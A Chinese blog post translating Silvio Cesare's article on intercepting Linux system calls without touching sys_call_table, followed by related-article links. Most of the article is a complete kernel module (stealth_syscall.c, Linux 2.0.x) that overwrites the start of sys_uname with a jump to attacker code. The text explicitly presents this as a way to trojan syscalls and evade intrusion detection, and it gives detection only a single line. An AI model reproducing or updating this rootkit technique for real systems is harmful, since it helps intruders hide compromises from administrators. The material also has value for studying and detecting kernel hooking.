linux 系统调用 -- 不用syscall table的方法来截获系统调用的方法的分析

最新推荐文章于 2024-05-15 16:46:44 发布
最新推荐文章于 2024-05-15 16:46:44 发布
阅读量1.9k 收藏 1
点赞数
文章标签: table linux struct module 测试

不用syscall table的方法来截获系统调用的方法的分析  关注Linuxeden官方微博 前言: 拿到quack给我的这个文章真是很巧,正在整理分析linux系统调用的实现源代码,所以先翻译一下这 篇文章,然后谈一些自己的想法,文章的实现代码是基于2.0.x内核的,这个code在2.2.x内核上也可以编 译,主要看实现的原理方法了。 以下是译文: by Silvio Cesare 译:大鹰 本文描述了一种可以不利用syscall table来截获系统调用的方法(在linux的实现),它可以被用来 利用截获系统调用表注册或者trojan系统调用来逃避入侵监测系统。它还是一个简单的发现攻击行为的方 法。最基本的前提是攻击时需要改变旧的系统调用来跳转到新的系统调用,因此控制权交给新的系统调用 并且syscall table并没有变化。但,如果只有仅仅这些的话,那么原来的系统调用就很糟糕了,并且执 行起来会非常危险,所以当系统调用创建的时候原来的code必须被保存下来。原来的code被跳转指针替代 并且系统调用看起来和平常一样正常运行。在这之后,跳转指针会再次放置等待下次使用。要发现这种攻 击手段必须非常小心仔细地比较原系统调用的头几个字节来判断系统调用是否被截获。 ******************************************************************************************** 译者注:我们以前的截获实现是通过给syscall table注册一个new的sys call来截获,现在,新的方 法是我们来修改旧的系统调用的code来实现截获,加一个跳转指针指向new的sys call,并不需要添加注册 到syscall table中,从而可以逃避管理员的监测。 ******************************************************************************************** 以下是2.0.x的测试代码,我加以注释帮助大家理解: -- stealth_syscall.c (Linux 2.0.35) #include #include #include #include #include #include #include #include #define SYSCALL_NR __NR_uname static char syscall_code[7]; static char new_syscall_code[7] = "/xbd/x00/x00/x00/x00" /* movl $0,%ebp */ "/xff/xe5" /* jmp *%ebp */ /*定义新的sys_code,其实就是一 个跳转指令*/ ; extern void *sys_call_table[]; void *_memcpy(void *dest, const void *src, int size)/*这个应该很熟悉了,在2.0.x内核中定义一 个数据传递函数*/ { const char *p = src; char *q = dest; int i; for (i = 0; i < size; i++) *q++ = *p++; return dest; } /* uname */ int new_syscall(struct new_utsname *buf) /*定义新的uname系统调用*/ { printk(KERN_INFO "UNAME - Silvio Cesare/n"); _memcpy( sys_call_table[SYSCALL_NR], syscall_code, sizeof(syscall_code) ); ((int (*)(struct new_utsname *))sys_call_table[SYSCALL_NR])(buf);/*正常运行系统调用 */ _memcpy( sys_call_table[SYSCALL_NR], new_syscall_code,/*等待再次使用*/ sizeof(syscall_code) ); } int init_module(void) /*加载*/ { *(long *)&new_syscall_code[1] = (long)new_syscall; /*把新的syscall_code指向 new_syscall*/ _memcpy( syscall_code, sys_call_table[SYSCALL_NR], /*保存原来的syscall_code*/ sizeof(syscall_code) ); _memcpy( sys_call_table[SYSCALL_NR], new_syscall_code, /*好,注入新的code!实现截获*/ sizeof(syscall_code) ); return 0; } void cleanup_module(void) /*卸载*/ { _memcpy( sys_call_table[SYSCALL_NR], syscall_code, /*重新注入新的syscall_code*/ sizeof(syscall_code) ); }

b02042236
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
kernel-module-syscall:拦截系统调用
02-21
系统调用拦截 在Linux上使用可加载的内核模块拦截系统调用的概念证明。 测试于:Linux debian 4.19.0-14-amd64#1 SMP Debian 4.19.171-2(2021-01-30)x86_64 GNU / Linux
三种方法实现Linux系统调用
09-15
总结来说,Linux系统调用可以通过glibc库函数、`syscall`函数以及汇编语言直接调用三种方式进行。选择哪种方法取决于项目需求,如可移植性、性能、代码可读性和易维护性等因素。在大多数情况下,使用glibc库函数是最...
linux 系统调用表 sys_call_table 获取方法
whatday的专栏
09-03 4865
一.方法一:常用方式,也是一google一堆的方式 我们首先需要找到call table-with-offset的特征,先看下面的代码 syscall_call: call *sys_call_table(,%eax,4) 假设我们没有vmlinux可供gdb反汇编,那也只有采用模拟的方式了,模拟出一个call *sys_call_table(,%eax,4),然后看其机器...
Linux x86平台获取sys_call_table
最新发布
2301_79054215的博客
05-15 320
2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?7、Tomcat和Resin有什么区别,工作中你怎么选择?14、讲一下Keepalived的工作原理?
Linux关于sys_call_table的使用
赵四司机的博客
11-06 835
系统调用服务程序的地址存放在sys_call_table中,通过系统调用号定位到具体的系统调用地址,然后我们就可以通过编写内核模块来修改sys_call_table中的系统调用的地址来为我们自己定义的函数的地址,可以实现系统调用的拦截。但是我的版本不支持sys_call_table的导出,所以需要获得sys_call_table的地址,通过sudo cat /proc/kallsyms | grep sys_call_table 可以看出sys_call_table数组的首地址为0xffffffffb5
【网络资源学习笔记】ShellCode相关内容学习
天在等我,菜鸟想飞
07-14 2473
个人shellcode相关网络资源学习记录
Linux4.19-通过IDT获取sys_call_table实现系统调用劫持
CalvinXu
05-09 1881
上一篇博客写了如何获取IDT地址,这里将接着上一篇博客继续写,如果还不清楚如何获取IDT可以看一下我的上一篇博客:Linux4.19-获取IDT地址:https://blog.csdn.net/qq_41208289/article/details/106012230 这里再次声明一下,博主的系统为目前最新版本的Debian10,Linux4.19内核(32位x86机器) 前言 网上的绝大部分博客对于获取sys_call_table方法在目前的内核中都已经失效,Linux大概从4.8开始加入了保
防止恶意LKM修改Linux系统调用方法研究.pdf
09-06
系统调用监控模块的原理是:Linux加载LKM时,系统调用SYSCALL-init—module会被调用,修改SYSCALL-init—module,加入监控系统调用表的功能。这样,可以在LKM加载时检测系统调用表是否被修改,如果被修改就通知系统...
syscall-table:从 Linux 源生成 JSON 系统调用信息
07-24
Linux 源生成 JSON 系统调用表。 托管在 。 生成 JSON $ brew install ctags $ easy_install python-ctags simplejson $ tar -zxvf linux-2.6.35.4.tar.gz $ cd linux-2.6.35.4 $ ctags --fields=afmikKlnsStz ...
如何在Linux系统中添加新的系统调用
07-30
Linux系统中添加新的系统调用是一个涉及到操作系统内核级别的编程任务,这通常需要对Linux内核机制有深入的理解。系统调用是操作系统提供给应用程序的接口,允许用户空间的程序安全地使用内核功能,如文件操作、...
浅析Linux系统调用方法.pdf
09-06
Linux系统调用方法】是操作系统的核心组成部分,它提供了用户空间程序与操作系统内核进行交互的接口。本文以RedHat Linux 2.4.18为例,详细解析了Linux系统调用的实现机制。 首先,系统调用是连接用户程序和...
截获系统调用(sys_call_table/VFS)
yun2205446823的专栏
02-29 1454
转自http://blog.chinaunix.net/uid-20196318-id-28808.html 方法1:修改系统调用表(适用于linux-2.4内核) 内核使用sys_call_table数组来存储系统调用表,将系统调用号与系统调用处理函数对应起来,通过修改sys_call_table数组的某一个元素,即可实现截获系统调用的功能,在2.4内核中,sys_call_table
ARMv8 Linux内核异常处理过程分析
Heron——Linux & ARM
05-30 9253
看了Linaro提供的开源ARMv8 Linux内核源码,发现ARMv8异常处理与ARMv7及之前的架构有所不同,详细分析之。
间接系统调用syscall(SYS_gettid)
辛明辉的专栏
10-26 1万+
linux下每一个进程都一个进程id,类型pid_t,可以由getpid()获取。POSIX线程也有线程id,类型pthread_t,可以由pthread_self()获取,线程id由线程库维护。但是各个进程独立,所以会有不同进程中线程号相同节的情况。那么这样就会存在一个问题,我的进程p1中的线程pt1要与进程p2中的线程pt2通信怎么办,进程id不可以,线程id又可能重复,所以这里会有一个真实的
ARM64内核系统调用添加方法(基于kernel-4.9)
程序猿Ricky的日常干货
04-13 4305
既上一篇介绍了ARM64内核系统调用详解之后,本篇文章来介绍如何添加自己的系统调用到内核中。 根据上一篇我们知道如下关键的几点: (1)ARM64的系统调用分为32-bit模式和64-bit模式。 (2)32-bit模式的系统调用syscall定义在头文件arch/arm64/include/asm/unistd32.h (3)64-bit模式的系统调用syscall...
Linux X86 系统调用列表 system call table 32 bits and 64 bits
benben2301的专栏
09-11 4977
yuan # # 32-bit system call numbers and entry vectors # # The format is: # # # The abi is always "i386" for this file. # 0 i386 restart_syscall sys_restart_syscall 1 i386 exit sys_exit 2 i386
ARM64内核系统调用详解(基于kernel-4.9)
热门推荐
程序猿Ricky的日常干货
04-12 1万+
本文以ARM64为例,介绍如何添加系统调用,首先来介绍一些代码执行流程: 首先来看异常向量表的配置,内核在arch/arm64/kernel/entry.S汇编代码中设置了异常向量表。 /* * Exception vectors. */ .pushsection ".entry.text", "ax" .align 11 ENTRY(vectors) ker...
c99数组初始化的方法
跃祥博客
09-19 1707
const sys_call_ptr_t sys_call_table[__NR_syscall_max+1] = { /* *Smells like a like a compiler bug -- it doesn't work *when the &amp; below is removed. */ [0 ... __NR_syscall_max] = &amp;sys_ni_s...
Linux内核中增加一个系统调用.pdf
07-13
本资源详细介绍了如何在Linux内核中添加一个新的系统调用,以及编写相应的应用程序来使用这个系统调用。以下是对文件内容的详细说明: 一、程序设计思路与实现方式 1.1 添加系统调用的两种方法 - 编译内核法:这种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值